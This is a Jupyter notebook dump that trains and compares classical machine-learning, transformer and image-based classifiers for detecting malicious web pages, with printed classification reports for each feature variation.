" precision recall f1-score support\n\n benign 0.9274 0.9356 0.9315 15376\n malicious 0.9345 0.9262 0.9304 15260\n\n accuracy 0.9309 30636\n macro avg 0.9310 0.9309 0.9309 30636\nweighted avg 0.9310 0.9309 0.9309 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_original_features_remove_js, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8792 0.7832 0.8285 15376\n malicious 0.8032 0.8916 0.8451 15260\n\n accuracy 0.8372 30636\n macro avg 0.8412 0.8374 0.8368 30636\nweighted avg 0.8414 0.8372 0.8368 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_custom_features, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.7876 0.9757 0.8716 15376\n malicious 0.9678 0.7348 0.8354 15260\n\n accuracy 0.8557 30636\n macro avg 0.8777 0.8553 0.8535 30636\nweighted avg 0.8773 0.8557 0.8536 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_custom_features_without_js, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.5312 0.9705 0.6866 15376\n malicious 0.8215 0.1369 0.2347 15260\n\n accuracy 0.5553 30636\n macro avg 0.6763 0.5537 0.4606 30636\nweighted avg 0.6758 0.5553 0.4615 30636\n\n"
]
],
[
[
"## SVM",
"_____no_output_____"
]
],
[
[
"param_grid = {'C': [1, 10, 100, 1000], 'gamma': [0.001, 0.0001], 'kernel': ['rbf']}",
"_____no_output_____"
]
],
[
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(X_train_original_features, y_train)",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9431 0.9800 0.9612 15376\n malicious 0.9791 0.9404 0.9594 15260\n\n accuracy 0.9603 30636\n macro avg 0.9611 0.9602 0.9603 30636\nweighted avg 0.9610 0.9603 0.9603 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(np.array(X_train_original_features_remove_js), np.array(y_train))",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8645 0.8401 0.8521 15376\n malicious 0.8433 0.8673 0.8551 15260\n\n accuracy 0.8536 30636\n macro avg 0.8539 0.8537 0.8536 30636\nweighted avg 0.8539 0.8536 0.8536 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(X_train_custom_features, y_train)",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9796 0.9832 0.9814 15376\n malicious 0.9830 0.9794 0.9812 15260\n\n accuracy 0.9813 30636\n macro avg 0.9813 0.9813 0.9813 30636\nweighted avg 0.9813 0.9813 0.9813 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(X_train_custom_features_without_js, y_train)",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8741 0.8534 0.8636 15376\n malicious 0.8557 0.8761 0.8658 15260\n\n accuracy 0.8647 30636\n macro avg 0.8649 0.8648 0.8647 30636\nweighted avg 0.8650 0.8647 0.8647 30636\n\n"
]
],
[
[
"## KNN",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_original_features, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9231 0.9722 0.9470 15376\n malicious 0.9704 0.9184 0.9437 15260\n\n accuracy 0.9454 30636\n macro avg 0.9467 0.9453 0.9453 30636\nweighted avg 0.9467 0.9454 0.9453 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_original_features_remove_js, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8400 0.8125 0.8260 15376\n malicious 0.8171 0.8440 0.8304 15260\n\n accuracy 0.8282 30636\n macro avg 0.8285 0.8283 0.8282 30636\nweighted avg 0.8286 0.8282 0.8282 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_custom_features, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9538 0.9818 0.9676 15376\n malicious 0.9811 0.9521 0.9664 15260\n\n accuracy 0.9670 30636\n macro avg 0.9675 0.9669 0.9670 30636\nweighted avg 0.9674 0.9670 0.9670 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_custom_features_without_js, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8176 0.8219 0.8197 15376\n malicious 0.8196 0.8153 0.8174 15260\n\n accuracy 0.8186 30636\n macro avg 0.8186 0.8186 0.8186 30636\nweighted avg 0.8186 0.8186 0.8186 30636\n\n"
]
],
[
[
"## XGBoost",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier()\nxgboost_model.fit(X_train_original_features, y_train)",
"[18:30:03] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9593 0.9830 0.9710 15376\n malicious 0.9824 0.9580 0.9700 15260\n\n accuracy 0.9705 30636\n macro avg 0.9709 0.9705 0.9705 30636\nweighted avg 0.9708 0.9705 0.9705 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier()\nxgboost_model.fit(X_train_original_features_remove_js, y_train)",
"[18:30:05] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8715 0.8559 0.8636 15376\n malicious 0.8574 0.8729 0.8650 15260\n\n accuracy 0.8643 30636\n macro avg 0.8644 0.8644 0.8643 30636\nweighted avg 0.8645 0.8643 0.8643 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier()\nxgboost_model.fit(X_train_custom_features, y_train)",
"[18:30:06] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9892 0.9912 0.9902 15376\n malicious 0.9911 0.9891 0.9901 15260\n\n accuracy 0.9902 30636\n macro avg 0.9902 0.9902 0.9902 30636\nweighted avg 0.9902 0.9902 0.9902 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier(learning_rate=0.4)\nxgboost_model.fit(X_train_custom_features_without_js, y_train)",
"[18:30:07] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8842 0.8812 0.8827 15376\n malicious 0.8807 0.8837 0.8822 15260\n\n accuracy 0.8825 30636\n macro avg 0.8825 0.8825 0.8825 30636\nweighted avg 0.8825 0.8825 0.8825 30636\n\n"
]
],
[
[
"## Adaboost",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier()\nadaboost_model.fit(X_train_original_features, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9416 0.9787 0.9598 15376\n malicious 0.9776 0.9389 0.9578 15260\n\n accuracy 0.9588 30636\n macro avg 0.9596 0.9588 0.9588 30636\nweighted avg 0.9596 0.9588 0.9588 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier()\nadaboost_model.fit(X_train_original_features_remove_js, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8755 0.8321 0.8533 15376\n malicious 0.8389 0.8807 0.8593 15260\n\n accuracy 0.8563 30636\n macro avg 0.8572 0.8564 0.8563 30636\nweighted avg 0.8573 0.8563 0.8563 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier()\nadaboost_model.fit(X_train_custom_features, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9730 0.9812 0.9771 15376\n malicious 0.9809 0.9725 0.9767 15260\n\n accuracy 0.9769 30636\n macro avg 0.9769 0.9769 0.9769 30636\nweighted avg 0.9769 0.9769 0.9769 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier(learning_rate=0.4)\nadaboost_model.fit(X_train_custom_features_without_js, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8794 0.8396 0.8590 15376\n malicious 0.8454 0.8839 0.8643 15260\n\n accuracy 0.8617 30636\n macro avg 0.8624 0.8618 0.8616 30636\nweighted avg 0.8625 0.8617 0.8616 30636\n\n"
]
],
[
[
"## JavaScript Validation using tools",
"_____no_output_____"
]
],
[
[
"dataset_20['content'].iloc[0].split('()')",
"_____no_output_____"
],
[
"# js_content = dataset_20['content']\n\n# pbar = tqdm(len(js_content))\n# for index, content in enumerate(js_content):\n# with open(f'./js_dataset_20/{index}_content.js', 'w') as f:\n# f.write(content)\n# pbar.update(1)\n# pbar.close()",
"_____no_output_____"
]
],
[
[
"## Dataset Supplementation",
"_____no_output_____"
]
],
[
[
"phishtank_data = pd.read_csv('phishtank.csv')\nphishtank_data.head()",
"_____no_output_____"
]
],
[
[
"## Transformers ",
"_____no_output_____"
]
],
[
[
"# # Preparing train data\n# train_data = [\n# [\"Aragorn was the heir of Isildur\", 1],\n# [\"Frodo was the heir of Isildur\", 0],\n# ]\n# train_df = pd.DataFrame(train_data)\n# train_df.columns = [\"text\", \"labels\"]\n\n# # Preparing eval data\n# eval_data = [\n# [\"Theoden was the king of Rohan\", 1],\n# [\"Merry was the king of Rohan\", 0],\n# ]\n# eval_df = pd.DataFrame(eval_data)\n# eval_df.columns = [\"text\", \"labels\"]",
"_____no_output_____"
],
[
"transformer_df = dataset_20_supp[['url', 'label']]\ntransformer_df['label'] = transformer_df['label'].apply(lambda x: 1 if 'bad' in x else 0)\n# transformer_df['url'] = transformer_df['url'].apply(lambda x: x.replace('...', ''))",
"/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:2: SettingWithCopyWarning:\n\n\nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n\n"
],
[
"train_trans_df, test_trans_df = train_test_split(transformer_df, test_size=0.33, random_state=42)",
"_____no_output_____"
],
[
"model_args = ClassificationArgs(num_train_epochs=2, train_batch_size=256)\n\n# Create a ClassificationModel\nmodel = ClassificationModel(\n \"distilbert\", \"distilbert-base-cased\", args=model_args, use_cuda=False)\n\n# # Train the model\n# model.train_model(train_trans_df)\n\n# Evaluate the model\nresult, model_outputs, wrong_predictions = model.eval_model(test_trans_df)",
"Some weights of the model checkpoint at distilbert-base-cased were not used when initializing DistilBertForSequenceClassification: ['vocab_layer_norm.weight', 'vocab_transform.bias', 'vocab_projector.bias', 'vocab_projector.weight', 'vocab_layer_norm.bias', 'vocab_transform.weight']\n- This IS expected if you are initializing DistilBertForSequenceClassification from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model).\n- This IS NOT expected if you are initializing DistilBertForSequenceClassification from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model).\nSome weights of DistilBertForSequenceClassification were not initialized from the model checkpoint at distilbert-base-cased and are newly initialized: ['classifier.weight', 'pre_classifier.weight', 'pre_classifier.bias', 'classifier.bias']\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\n/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/simpletransformers/classification/classification_model.py:1376: UserWarning:\n\nDataframe headers not specified. Falling back to using column 0 as text and column 1 as labels.\n\n"
]
],
[
[
"## Image Classification Approach",
"_____no_output_____"
],
[
"### Reading images",
"_____no_output_____"
]
],
[
[
"import cv2\nfrom glob import glob as globlin\n\nimage_paths = globlin('./img_extraction/dataset_20_images/*.png')\n\nbenign_images = []\nmalicious_images = []\npbar = tqdm(total=len(image_paths))\n\nfor path in image_paths:\n image = cv2.resize(cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB), (512, 512))\n if 'bad' in path:\n malicious_images.append(image)\n else:\n benign_images.append(image)\n pbar.update(1)\npbar.close()\n\nprint(f'Starting Number of Malicious Images = {len(malicious_images)}')\nprint(f'Starting Number of Benign Images = {len(benign_images)}')",
"100%|██████████| 14097/14097 [02:14<00:00, 105.00it/s]"
]
],
[
[
"### Removing images with a could not connect page, or white page",
"_____no_output_____"
]
],
[
[
"from skimage.metrics import structural_similarity as ssim\n \ndef cleave_error_images(reference_image, cutoff_score, image_list):\n cleave_index = []\n for i in tqdm(range(0, len(image_list))):\n try:\n ssim_noise = ssim(reference_image, image_list[i], multichannel=True)\n if ssim_noise >= cutoff_score:\n cleave_index.append(i)\n except:\n cleave_index.append(i)\n return cleave_index\n\n\nreference_image = malicious_images[4]\nmalicious_images_idx = cleave_error_images(reference_image, 0.9, malicious_images)\nbenign_image_idx = cleave_error_images(reference_image, 0.9, benign_images)\n\nprint(f'Number of Malicious Images after deletion = {len(malicious_images) - len(malicious_images_idx)}')\nprint(f'Number of Benign Images after deletion = {len(benign_images) - len(benign_image_idx)}')",
"100%|██████████| 6101/6101 [05:11<00:00, 19.59it/s]\n100%|██████████| 7996/7996 [06:43<00:00, 19.84it/s]"
],
[
"new_malicious_images = np.delete(np.array(malicious_images), malicious_images_idx, axis=0)\nnew_benign_images = np.delete(np.array(benign_images), benign_image_idx, axis=0)",
"_____no_output_____"
],
[
"np.savez('./img_extraction/malicious_images.npz', new_malicious_images)\nnp.savez('./img_extraction/benign_images.npz', new_benign_images)",
"_____no_output_____"
]
],
[
[
"### Image checkpoint",
"_____no_output_____"
]
],
[
[
"malicious_img = np.load('./img_extraction/malicious_images.npz', allow_pickle=True)['arr_0']\nbenign_img = np.load('./img_extraction/benign_images.npz', allow_pickle=True)['arr_0']",
"_____no_output_____"
],
[
"plt.imshow(benign_img[3])",
"_____no_output_____"
],
[
"malicious_img",
"_____no_output_____"
],
[
"plt.imshow(malicious_img[2])",
"_____no_output_____"
]
],
[
[
" ### Machine Learning ",
"_____no_output_____"
]
],
[
[
"from tensorflow.python.client import device_lib\n\ndevice_lib.list_local_devices()",
"_____no_output_____"
],
[
"import os\n\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"",
"_____no_output_____"
]
],
[
[
"#### Train-test-split",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf",
"_____no_output_____"
],
[
"y_malicious = np.full(len(malicious_img), 1)\ny_benign = np.full(len(benign_img), 0) \n\nlabels_df = np.array(np.concatenate([y_malicious, y_benign]).astype(np.float32))",
"_____no_output_____"
],
[
"image_df = np.array(np.concatenate([malicious_img, benign_img]))\n\n# image_df = [image_df[i].astype(np.int) for i in tqdm(range(len(image_df)))]",
"_____no_output_____"
],
[
"X_train_img, X_test_img, y_train_img, y_test_img = train_test_split(image_df, labels_df, test_size=0.33, random_state=42)",
"_____no_output_____"
]
],
[
[
"#### Lenet-5",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Dense, AveragePooling2D, Flatten, Dropout\n\nmodel = Sequential([\n Conv2D(filters=6,\n kernel_size=(3, 3),\n activation='relu',\n input_shape=X_train_img[0].shape),\n Conv2D(filters=16, kernel_size=(3, 3), activation='relu'),\n AveragePooling2D(),\n Flatten(),\n Dense(units=120, activation='relu'),\n Dense(units=84, activation='relu'),\n Dense(units=1, activation='softmax')\n])",
"_____no_output_____"
],
[
"model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel_history = model.fit(X_train_img, y_train_img, #validation_data=(X_valid_NN, y_valid_NN), \n epochs=15, batch_size=256, verbose=True)",
"Epoch 1/15\n37/37 [==============================] - 638s 17s/step - loss: 11943.7792 - accuracy: 0.4305\nEpoch 2/15\n 4/37 [==>...........................] - ETA: 9:47 - loss: 213.0984 - accuracy: 0.4080 "
],
[
"y_pred = (model.predict(X_test_img) > 0.5).astype(\"int32\")\n\naccuracy_score(y_test_img, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test_img, y_pred)",
"_____no_output_____"
]
],
[
[
"#### Pretrained inception V3",
"_____no_output_____"
]
],
[
[
"inception_model = tf.keras.applications.InceptionV3(\n include_top=False, weights='imagenet', input_tensor=None, input_shape=X_train_img[0].shape,\n pooling=None, classes=1000, classifier_activation=None\n)\n\nfor layer in inception_model.layers:\n layer.trainable = False\nx = Flatten()(inception_model.output)\nx = Dense(1024, activation='relu')(x)\nx = Dropout(0.7)(x)\nx = Dense(75, activation='relu')(x)\nx = Dropout(0.2)(x)\nx = Dense(1, activation='sigmoid')(x)\n\ninception_model = tf.keras.Model(inception_model.input, x)\n#inception_model.summary()",
"_____no_output_____"
],
[
"epochs = 5\nbatch_size = 5\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.01, name='adam')\nloss_function = tf.keras.losses.binary_crossentropy\n\ninception_model.compile(optimizer=optimizer, loss=loss_function, metrics=['accuracy'])\n\nhistory = inception_model.fit(x=X_train_img,\n y=y_train_img,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=0.2)",
"_____no_output_____"
],
[
"y_pred_proba = inception_model.predict(X_test_img)\ny_pred = np.argmax(y_pred_proba, axis=-1)\naccuracy_score(y_test_img, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test_img, y_pred)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
e7089de1707dc9fec29389521d0593da894bf7d7 | 83,240 | ipynb | Jupyter Notebook | gnunify2015/gnunify06_Miscellaneous.ipynb | satish-annigeri/Notebooks | 92a7dc1d4cf4aebf73bba159d735a2e912fc88bb | [
"CC0-1.0"
] | null | null | null | gnunify2015/gnunify06_Miscellaneous.ipynb | satish-annigeri/Notebooks | 92a7dc1d4cf4aebf73bba159d735a2e912fc88bb | [
"CC0-1.0"
] | null | null | null | gnunify2015/gnunify06_Miscellaneous.ipynb | satish-annigeri/Notebooks | 92a7dc1d4cf4aebf73bba159d735a2e912fc88bb | [
"CC0-1.0"
] | null | null | null | 203.02439 | 69,359 | 0.895531 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
